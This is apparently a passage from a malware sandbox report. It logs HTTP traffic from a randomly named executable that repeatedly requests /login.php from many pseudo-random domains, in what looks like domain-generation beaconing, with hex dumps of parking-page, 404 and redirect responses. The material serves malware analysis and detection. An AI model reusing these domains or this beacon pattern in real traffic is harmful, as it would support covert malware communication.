Content-Type: text/html; charset=utf-8
Content-Length: 55
Connection: keep-alive
Location: http://www.gahyqah.com/login.php
X-Served-By: Namecheap URL Forward
Server: namecheap-nginx
Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.6 | 50246 | 91.195.240.19 | 80 | 5128 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:14.274794102 CET | 271 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: www.gahyqah.com
Connection: Keep-Alive
Nov 11, 2024 18:51:14.965106010 CET | 1236 | IN | HTTP/1.1 200 OK
date: Mon, 11 Nov 2024 17:51:14 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
vary: Accept-Encoding
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
last-modified: Mon, 11 Nov 2024 17:51:14 GMT
x-cache-miss-from: parking-7596689c44-ptvfg
server: Parking/1.0
                                                                                                                                                                                                                  Data Ascii: 9494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.966801882 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 7b 70 6f 73 69
                                                                                                                                                                                                                  Data Ascii: ;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.966816902 CET1236INData Raw: 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 63 6f 6c 6f 72 3a 23 66 66 66
                                                                                                                                                                                                                  Data Ascii: al}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color:#727c83;borde
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.967444897 CET1236INData Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 56 65 72 64 61 6e 61 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 73 61 6e 73 2d 73 65 72 69 66
                                                                                                                                                                                                                  Data Ascii: round-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bottom:10px}.container-content{text
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.967456102 CET1236INData Raw: 28 2d 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 7a 2d 69 6e 64 65 78 3a 2d 31 3b 74 6f 70 3a 35 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                                  Data Ascii: (-1);transform:scaleX(-1);z-index:-1;top:50px;position:inherit}.container-content--lp{min-height:720px}.container-content--rp{min-height:820px}.container-content--rp .container-content__right,.container-content--rp .container-content__left{bac
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.967467070 CET91INData Raw: 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e
                                                                                                                                                                                                                  Data Ascii: element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline
                                                                                                                                                                                                                  Nov 11, 2024 18:51:14.970809937 CET1236INData Raw: 35 37 36 0d 0a 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74
                                                                                                                                                                                                                  Data Ascii: 576}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-link:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#9fd801;fo


Session ID | Source IP | Source Port | Destination IP | Destination Port
91 | 192.168.2.6 | 59192 | 154.212.231.82 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:16.555241108 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadyniw.com
Nov 11, 2024 18:51:17.440397978 CET | 696 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:51:17 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port
92 | 192.168.2.6 | 59199 | 3.94.10.34 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:19.303925037 CET | 353 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lymyxid.com
Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347473|1731347428|13|3|0
Nov 11, 2024 18:51:19.733899117 CET | 334 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:51:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347479|1731347428|9|4|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.6 | 59196 | 199.191.50.83 | 80 | 3328 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe

Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:19.304039001 CET | 281 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galyqaz.com
Cookie: vsid=903vr478893028933998491
Nov 11, 2024 18:51:21.480437994 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 17:51:19 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Data Ascii: on handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://galyqaz.com/sk-logabpstatus.php?a=SkpPSHVUbmZKc0VMdDA0MTA5Yk8zZXhLVlpiT3JPbjdsUXJVNzVzV25


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
94          192.168.2.6  59195        44.221.84.105   80                3328  C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp  Bytes transferred  Direction  Data
Nov 11, 2024 18:51:19.316389084 CET  352  OUT  GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyfuv.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347473|1731347428|9|4|0
Nov 11, 2024 18:51:19.732925892 CET  334  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:19 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347479|1731347428|7|5|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
95          192.168.2.6  59198        44.221.84.105   80                3328  C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp  Bytes transferred  Direction  Data
Nov 11, 2024 18:51:19.316392899 CET  353  OUT  GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vocyzit.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347473|1731347428|13|3|0
Nov 11, 2024 18:51:19.731360912 CET  334  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:19 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347479|1731347428|9|4|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
96          192.168.2.6  59197        199.59.243.227  80                3328  C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp  Bytes transferred  Direction  Data
Nov 11, 2024 18:51:19.318542957 CET  305  OUT  GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vojyqem.com
                                                                                                                                                                                                                  Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Nov 11, 2024 18:51:19.730324984 CET  1236  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:18 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1094
                                                                                                                                                                                                                  x-request-id: a864822b-6a6f-48ea-938d-f29b46c30e35
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                                  set-cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723; expires=Mon, 11 Nov 2024 18:06:19 GMT


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
97          192.168.2.6  59200        188.114.96.3    80                3328  C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp  Bytes transferred  Direction  Data
Nov 11, 2024 18:51:21.852452993 CET  243  OUT  GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
Nov 11, 2024 18:51:22.371321917 CET  793  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:22 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S5ANPRQ0oEhY01hWUgIfPwOSkVNxW2eFU0NyLkjvQm9weZ3VhMBeiWrxMYW7bqLBNnjslWrVsxtMqrbCYtYUbdNqi7u%2FfsgvtYSoZPL4uZ%2BksvyCqyvVcJoIRrLv1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e102141d8bdac5d-YYZ
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=12209&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=35&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 11, 2024 18:51:22.374891043 CET  173  IN  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
98          192.168.2.6  59207        154.212.231.82  80                3328  C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp  Bytes transferred  Direction  Data
Nov 11, 2024 18:51:21.873689890 CET  243  OUT  GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
Nov 11, 2024 18:51:22.755846024 CET  696  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:22 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                  99 | 192.168.2.6 | 59205 | 208.100.26.245 | 80 | 3328 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.875442028 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:22.315754890 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:22 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                  100 | 192.168.2.6 | 59204 | 178.162.203.226 | 80 | 3328 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.876887083 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                  101 | 192.168.2.6 | 59206 | 99.83.170.3 | 80 | 3328 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.876890898 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: puzylyp.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:22.296226978 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Location: https://puzylyp.com/login.php
                                                                                                                                                                                                                  Server: Caddy
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:22 GMT
                                                                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                  102 | 192.168.2.6 | 59208 | 18.208.156.248 | 80 | 3328 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.876971006 CET | 353 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vonypom.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:22.304280043 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:22 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347482|1731347428|18|3|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                  103 | 192.168.2.6 | 59203 | 162.255.119.102 | 80 | 3328 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.877520084 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:22.403788090 CET | 303 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:22 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
